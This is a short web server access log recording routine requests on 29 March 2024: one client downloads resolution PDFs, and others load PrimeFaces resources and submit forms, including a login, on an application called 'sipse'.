52.167.144.21 - - [29/Mar/2024:11:11:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0933.pdf HTTP/1.1" 200 484403
52.167.144.21 - - [29/Mar/2024:11:11:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1724.pdf HTTP/1.1" 200 500093
52.167.144.21 - - [29/Mar/2024:11:11:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1227.pdf HTTP/1.1" 200 645131
52.167.144.21 - - [29/Mar/2024:11:11:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2373.pdf HTTP/1.1" 200 512520
52.167.144.21 - - [29/Mar/2024:11:11:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2044.pdf HTTP/1.1" 200 545549
52.167.144.21 - - [29/Mar/2024:11:11:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3426.pdf HTTP/1.1" 200 611253
52.167.144.21 - - [29/Mar/2024:11:11:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1397.pdf HTTP/1.1" 200 559177
52.167.144.21 - - [29/Mar/2024:11:11:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0794.pdf HTTP/1.1" 200 417470
179.60.242.67 - - [29/Mar/2024:11:11:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:29 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
52.167.144.0 - - [29/Mar/2024:11:11:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0994.pdf HTTP/1.1" 200 4182857
179.60.242.67 - - [29/Mar/2024:11:11:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:30 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:27 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 200 199803
179.60.242.67 - - [29/Mar/2024:11:11:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 19885
179.60.242.67 - - [29/Mar/2024:11:11:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:35 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:35 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:35 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.60.242.67 - - [29/Mar/2024:11:11:35 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.55.46.207 - - [29/Mar/2024:11:11:35 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11368
181.55.46.207 - - [29/Mar/2024:11:11:36 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
181.55.46.207 - - [29/Mar/2024:11:11:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.55.46.207 - - [29/Mar/2024:11:11:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.55.46.207 - - [29/Mar/2024:11:11:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
